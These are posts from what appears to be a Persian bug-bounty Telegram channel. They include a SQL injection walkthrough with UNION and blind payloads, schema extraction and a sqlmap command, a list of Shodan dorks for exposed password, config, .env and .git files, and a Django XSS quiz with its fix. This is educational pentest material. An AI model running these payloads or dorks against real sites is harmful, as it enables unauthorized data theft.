🎯 چرا ' در Sql Injection نتیجه نمیدهد؟
✅ ممکن است دلایل زیر مانع از نمایش نتیجه شوند:
خطاها در سمت سرور نمایش داده نمیشوند (Error Handling فعال است).
ورودی فیلتر شده و از بروز خطای SQL جلوگیری میشود.
تزریق در پارامتر اشتباه انجام شده است.
1- تست Blind SQL Injection:
🔹 اگر خروجی مشخصی نمیبینید، ممکن است با Blind SQL Injection مواجه باشید. از این روشها استفاده کنید:
الف. Boolean-Based Injection:
ب. Time-Based Injection:
2- شناسایی ستونها با UNION
✅ تعداد ستونها را با ORDER BY شناسایی کنید:
وقتی به خطا رسیدید، تعداد ستونها یک عدد کمتر از مقدار تستشده است.
✅ بعد از شناسایی تعداد ستونها، از UNION SELECT استفاده کنید:
3- پیدا کردن ستونهای قابل مشاهده
🔹 برای پیدا کردن ستونهایی که خروجی آنها در صفحه نمایش داده میشود:
🔑 وقتی مقدار 'test' نمایش داده شد، ستون قابل مشاهده است.
4- استخراج اطلاعات حساس
✅ نسخه پایگاه داده:
✅ نام جداول موجود:
استفاده از ابزارهای خودکار
💻 ابزار Sqlmap به شما کمک میکند که بهصورت خودکار تزریق SQL را شناسایی و اطلاعات را استخراج کنید:
#پنتست #SQLi #امنیت_سایبری #باگ_بانتی
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
✅ ممکن است دلایل زیر مانع از نمایش نتیجه شوند:
خطاها در سمت سرور نمایش داده نمیشوند (Error Handling فعال است).
ورودی فیلتر شده و از بروز خطای SQL جلوگیری میشود.
تزریق در پارامتر اشتباه انجام شده است.
1- تست Blind SQL Injection:
🔹 اگر خروجی مشخصی نمیبینید، ممکن است با Blind SQL Injection مواجه باشید. از این روشها استفاده کنید:
الف. Boolean-Based Injection:
?id=1 AND 1=1 -- (خروجی باید بدون تغییر باشد)
?id=1 AND 1=2 -- (خروجی باید تغییر کند یا صفحه خطا دهد)
ب. Time-Based Injection:
?id=1 AND SLEEP(5) -- (صفحه باید با تأخیر بارگذاری شود)
2- شناسایی ستونها با UNION
✅ تعداد ستونها را با ORDER BY شناسایی کنید:
?id=1 ORDER BY 1--
?id=1 ORDER BY 2--
وقتی به خطا رسیدید، تعداد ستونها یک عدد کمتر از مقدار تستشده است.
✅ بعد از شناسایی تعداد ستونها، از UNION SELECT استفاده کنید:
?id=1 UNION SELECT 1,2,3,4--
3- پیدا کردن ستونهای قابل مشاهده
🔹 برای پیدا کردن ستونهایی که خروجی آنها در صفحه نمایش داده میشود:
?id=1 UNION SELECT 1,'test',3,4--
🔑 وقتی مقدار 'test' نمایش داده شد، ستون قابل مشاهده است.
4- استخراج اطلاعات حساس
✅ نسخه پایگاه داده:
?id=1 UNION SELECT 1,@@version,3,4--
?id=1 UNION SELECT 1,version(),3,4--
✅ نام جداول موجود:
?id=1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--
استفاده از ابزارهای خودکار
💻 ابزار Sqlmap به شما کمک میکند که بهصورت خودکار تزریق SQL را شناسایی و اطلاعات را استخراج کنید:
sqlmap -u "http://example.com/page.php?id=1" --dbs
#پنتست #SQLi #امنیت_سایبری #باگ_بانتی
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍14❤4👎1
Bug Bounty Beginner's.pdf
187.9 KB
🚄راهنمای خوبی هست اگر هنوز سر اینکه از چی بخونم، از کجا بخونم مشکل دارید....🤔🤔
#BugBounty #book
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
#BugBounty #book
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍12❤5
🤑Shodan Secrets | Hack Hidden Files Easily
🛑Default Directory Listing
🛑Backup Files
🛑Compressed Achives
🛑Database Files
🛑Configuration Files
🛑Wordpress Configuration Files
🛑Passwords
🛑Windows Server Config Files
🛑Exposed Logs
🛑Configuration and Version Control Files
🛑Git Repositories
📃 source
#shodan #Dorks
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
🛑Default Directory Listing
http.html:"index of /"
🛑Backup Files
http.html:"index of /" http.html:"backup"
🛑Compressed Achives
http.html:"index of /" http.html:"tar.gz"
🛑Database Files
http.html:"index of /" http.html:"database"
http.html:"index of /" http.html:".sql"
http.html:"index of /" http.html:".db"
http.html:"index of /" http.html:"db_backup"
http.html:"index of /" http.html:"mysql.dump"
http.html:"index of /" http.html:".mdb"
🛑Configuration Files
http.html:"index of /" http.html:"config.xml"
🛑Wordpress Configuration Files
http.html:"index of /" http.html:"wp-config.php.txt"
http.html:"index of /" http.html:"wp-config.txt"
http.html:"index of /" http.html:"wp-config.php.bak"
http.html:"index of /" http.html:"wp-config.php.old"
http.html:"index of /" http.html:"wp-config.php.backup"
http.html:"index of /" http.html:"wp-config.php.zip"
http.html:"index of /" http.html:"wp-config.php.tar.gz"
🛑Passwords
http.html:"index of /" http.html:"pwd"
http.html:"index of /" http.html:"pass.txt"
http.html:"index of /" http.html:"password"
http.html:"index of /" http.html:"password.txt"
http.html:"index of /" http.html:"passwords.txt"
http.html:"index of /" http.html:"passwords.zip"
🛑Windows Server Config Files
http.html:"index of /" http.html:"web.config"
🛑Exposed Logs
http.html:"index of /" http.html:".log"
http.html:"index of /" http.html:"access.log"
http.html:"index of /" http.html:"error.log"
http.html:"index of /" http.html:"php_error.log"
http.html:"index of /" http.html:"debug.log"
🛑Configuration and Version Control Files
http.html:"index of /" http.html:".env"
http.html:"index of /" http.html:".svn"
🛑Git Repositories
http.html:"index of /" http.html:".git"
http.html:"index of /" http.html:"gitconfig"
📃 source
#shodan #Dorks
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍19❤3🤣2
همه چی در یک خط 🤔
➖یک ریپازیتوری فوقالعاده که مجموعهای از One-Liners آماده رو ارائه میده! با این دستورات کوتاه، میتونید subdomainها رو جمعآوری کنید، آسیبپذیریها رو شناسایی کنید، و کارهای دیگهای که توی باگبانتی نیاز دارید رو سریع انجام بدید. اگر دنبال ابزارهای سریع و کاربردی هستید، این دقیقاً همونه که لازم دارید.
🔗 لینک
#Github #BugBounty
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
➖یک ریپازیتوری فوقالعاده که مجموعهای از One-Liners آماده رو ارائه میده! با این دستورات کوتاه، میتونید subdomainها رو جمعآوری کنید، آسیبپذیریها رو شناسایی کنید، و کارهای دیگهای که توی باگبانتی نیاز دارید رو سریع انجام بدید. اگر دنبال ابزارهای سریع و کاربردی هستید، این دقیقاً همونه که لازم دارید.
🔗 لینک
#Github #BugBounty
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
👍13❤4
Hacking APIs - Early Access.pdf
12.5 MB
📕معرفی دوتا کتاب عالی برای یادگیری Hacking API
فقط اگر سطح زبان خوبی ندارید و نمیخاید خیلی وارد جزییات بشید و سر راست برید سر اصل مطلب پیشنهادم خوندن کتاب hacking API هست...
من بیشتر باهاش ارتباط برقرار کردم تا کتاب API Security in Action 🤷🏼♀️
شما کدوم رو خوندی و پیشنهاد میدید؟!
#API #hacking
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
فقط اگر سطح زبان خوبی ندارید و نمیخاید خیلی وارد جزییات بشید و سر راست برید سر اصل مطلب پیشنهادم خوندن کتاب hacking API هست...
من بیشتر باهاش ارتباط برقرار کردم تا کتاب API Security in Action 🤷🏼♀️
شما کدوم رو خوندی و پیشنهاد میدید؟!
#API #hacking
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
❤18👍2
Gareth_Heyes_JavaScript_for_hackers_Learn_to_think_like_a_hacker.pdf
1.8 MB
اگر جاوااسکریپت رو در حد قابل قبولی بلدید میتونید از این فایل استفاده کنید و موارد مورد نیاز امنیت در جاوااسکریپت رو یاد بگیرید...
اگر چیزی از جاوااسکریپت نمیدونید بهتره با این فایل شروع نکنید.
#javanoscript
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
#javanoscript
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
❤27👍10👌2😁1
برای روزایی ک شاید اینترنت نداشته باشید، عضو کانالش بشید و از منابع فارسیش استفاده کنید
کتاب های مهم رو ترجمه میکنه ...
@web_articles
کتاب های مهم رو ترجمه میکنه ...
@web_articles
👍10
🕵️♂️ کد آسیبپذیر !
یه فرم ساده داریم که با fetch دادهها رو به سرور میفرسته 👇
(همون چیزی که خیلیا برای تماس یا ثبتنام استفاده میکنن)
ر ظاهر همه چیز خوبه، نه؟ 😎
اما این کد یه آسیبپذیری امنیتی داره که میتونه راه نفوذ رو برای حملات باز کنه 😬
💬 به نظرتون مشکل کجاست و چطور میشه برطرفش کرد؟
(جوابتونو توی کامنتها بنویسین 👇)
#Django #Python #security
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
یه فرم ساده داریم که با fetch دادهها رو به سرور میفرسته 👇
(همون چیزی که خیلیا برای تماس یا ثبتنام استفاده میکنن)
<form id="contactForm">
{% csrf_token %}
{{ form.as_p }}
<button type="submit">ارسال</button>
</form>
<div id="result"></div>
<noscript>
document.getElementById("contactForm").addEventListener("submit", function(e) {
e.preventDefault();
fetch("{% url 'contact' %}", {
method: "POST",
body: new FormData(this),
headers: {
"X-Requested-With": "XMLHttpRequest"
}
})
.then(res => res.json())
.then(data => {
document.getElementById("result").innerHTML = data.message;
});
});
</noscript>
ر ظاهر همه چیز خوبه، نه؟ 😎
اما این کد یه آسیبپذیری امنیتی داره که میتونه راه نفوذ رو برای حملات باز کنه 😬
💬 به نظرتون مشکل کجاست و چطور میشه برطرفش کرد؟
(جوابتونو توی کامنتها بنویسین 👇)
#Django #Python #security
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
🔥7❤3👍1
یه مدت خبری ازم نبود… ولی برگشتم 😎
توی این مدت درگیر کار و چندتا پروژه بودم، و مجبور شدم از دنیای مورد علاقهم — ساختن و کشف کردن — کمی فاصله بگیرم.
حالا قراره دوباره از قدمهای کوچیک شروع کنیم، آرومآروم رشد کنیم و یکییکی پلهها رو بالا بریم تا باهم چالشهای دنیای وب رو پشت سر بذاریم. 🚀
خب یه سؤال!
شما بکاند سایت رو با چی شناختید یا شروع کردید؟
PHP 🔥
Flask, Django ❤️
.NET👻
یا فریمورکهای جاوااسکریپتی⚡️؟
با ریکشن نشون بدید ببینم کدوم یکی مخاطب بیشتری داره؟ میتونید نظرتون رو هم کامنت کنید😎
توی این مدت درگیر کار و چندتا پروژه بودم، و مجبور شدم از دنیای مورد علاقهم — ساختن و کشف کردن — کمی فاصله بگیرم.
حالا قراره دوباره از قدمهای کوچیک شروع کنیم، آرومآروم رشد کنیم و یکییکی پلهها رو بالا بریم تا باهم چالشهای دنیای وب رو پشت سر بذاریم. 🚀
خب یه سؤال!
شما بکاند سایت رو با چی شناختید یا شروع کردید؟
PHP 🔥
Flask, Django ❤️
.NET👻
یا فریمورکهای جاوااسکریپتی⚡️؟
با ریکشن نشون بدید ببینم کدوم یکی مخاطب بیشتری داره؟ میتونید نظرتون رو هم کامنت کنید😎
🔥37❤23⚡6🦄5👍2
Security hint
🕵️♂️ کد آسیبپذیر ! یه فرم ساده داریم که با fetch دادهها رو به سرور میفرسته 👇 (همون چیزی که خیلیا برای تماس یا ثبتنام استفاده میکنن) <form id="contactForm"> {% csrf_token %} {{ form.as_p }} <button type="submit">ارسال</button> </form> <div id…
🕵️♂️🔥خوب بریم سراغ جواب:
ممنون ازدوستانی که کامنت گذاشتن و جواب دادن❤️
یه فرم ساده داریم که با
ولی اولین نکته وجود sink خطرناک که اگر پیلودی ارسال بشه، در سرور هم درست بررسی و فیلتر نشه باعث حملات XSS میشه😱
چطوری توی همینجا امنش کنیم ؟!👇
1️⃣ بجای
2️⃣ یا در سمت سرور دادهها رو فیلتر و Escape کنیم🔒
————————————————————————-
🧩 بعضی دوستان به ارسال
اما اینجا یک نکته مهم وجود داره 👇
اگر از درخواستهای API / JSON بدون فرم استفاده میکنی،
باید توکن CSRF رو دستی از کوکی بگیری و در هدر بفرستی.
ولی در اینجا خود فرم شامل
پس نیازی به گرفتن مجدد CSRF نیست.
فقط کافیه از گزینهی
🧱 کد ایمن نهایی:
#Django #Python #security
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
ممنون ازدوستانی که کامنت گذاشتن و جواب دادن❤️
یه فرم ساده داریم که با
fetch دادهها رو میفرسته — ظاهراً همهچیز مرتبِ، نه؟ 😎ولی اولین نکته وجود sink خطرناک که اگر پیلودی ارسال بشه، در سرور هم درست بررسی و فیلتر نشه باعث حملات XSS میشه😱
document.getElementById("result").innerHTML = data.message;چطوری توی همینجا امنش کنیم ؟!👇
1️⃣ بجای
innerHTML از textContent استفاده کنیم ...✅2️⃣ یا در سمت سرور دادهها رو فیلتر و Escape کنیم🔒
————————————————————————-
🧩 بعضی دوستان به ارسال
CSRF_Token اشاره داشتن،اما اینجا یک نکته مهم وجود داره 👇
اگر از درخواستهای API / JSON بدون فرم استفاده میکنی،
باید توکن CSRF رو دستی از کوکی بگیری و در هدر بفرستی.
ولی در اینجا خود فرم شامل
{% csrf_token %} هست و FormData(this) مقدار csrfmiddlewaretoken رو در خودش داره ✅پس نیازی به گرفتن مجدد CSRF نیست.
فقط کافیه از گزینهی
credentials: "same-origin" استفاده کنی تا کوکیها هم ارسال بشن🧱 کد ایمن نهایی:
<form id="contactForm">
{% csrf_token %}
{{ form.as_p }}
<button type="submit">ارسال</button>
</form>
<div id="result"></div>
<noscript>
document.getElementById("contactForm").addEventListener("submit", function(e) {
e.preventDefault();
fetch("{% url 'contact' %}", {
method: "POST",
credentials: 'same-origin',
body: new FormData(this),
headers: {
"X-Requested-With": "XMLHttpRequest"
}
})
.then(res => res.json())
.then(data => {
document.getElementById("result").textContent = data.message;
});
});
</noscript>
#Django #Python #security
📌 برای مطالب بیشتر و آموزشهای تخصصی، کانال ما رو دنبال کنید!
🌐Sec_Hint & Boost & Youtube
❤5🔥2🏆1
به درخواست یکی از دوستان
ویدیو XSS در YouTube برای اشنایی بیشتر با XSS, JavaScript
https://youtu.be/s0GKrnTBxp0
#xss
ویدیو XSS در YouTube برای اشنایی بیشتر با XSS, JavaScript
https://youtu.be/s0GKrnTBxp0
#xss
🙏5👍3❤2
بیام با جنگو یک اپ کوچیک رو اموزش بدم ؟!🤔
بعدش میتونیم API هم روش تست کنیم🧐
بعدش میتونیم API هم روش تست کنیم🧐
👍29❤14👎2